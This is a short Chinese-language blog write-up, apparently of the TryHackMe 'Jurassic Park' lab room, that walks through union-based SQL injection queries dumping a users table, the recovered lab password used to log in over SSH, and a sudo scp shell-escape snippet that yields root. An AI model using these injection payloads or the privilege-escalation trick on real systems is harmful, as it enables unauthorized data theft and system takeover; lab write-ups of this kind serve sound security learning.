noone___'s blog
0%

THM打靶日寄27-Jurassic Park

发表于 分类于
德不配位(大雾,很难想象这个房间跟redteam capstone是一个难度的

  • 扫描打点

    • 80

      网站,点进去有个购物网站,看到 ?id=1 结合题上的提示,扫出来:

  • sql 注入拿账密

    找到注入点

    然后手测了一下,加引号会被过滤,直接加命令就行

    order by 测出来有 $5$ 列, union select 测出来第二列是回显位

    union select 1,database(),3,4,5# : park

    union select 1,version(),3,4,5# : ubuntu16.04

    union select 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()# : items,users

    union select 1,group_concat(column_name),3,4,5 FROM information_schema.columns WHERE table_schema=database() and table_name =users# : id,username,password

    union select 1,id,0x3a,password,5 FROM users

    拿到密码 ih8dinos

    从房间简介中的黑体字找到用户名:Dennis

    连到 ssh

  • 提权

    连进去手快进历史记录了,看到:

    flag3 不是重点,重点是有 scp 权限,直接:

    1
    2
    3
    4
    TF=$(mktemp)
    echo 'sh 0<&2 1>&2' > $TF
    chmod +x "$TF"
    sudo scp -S $TF x y:

    提到 root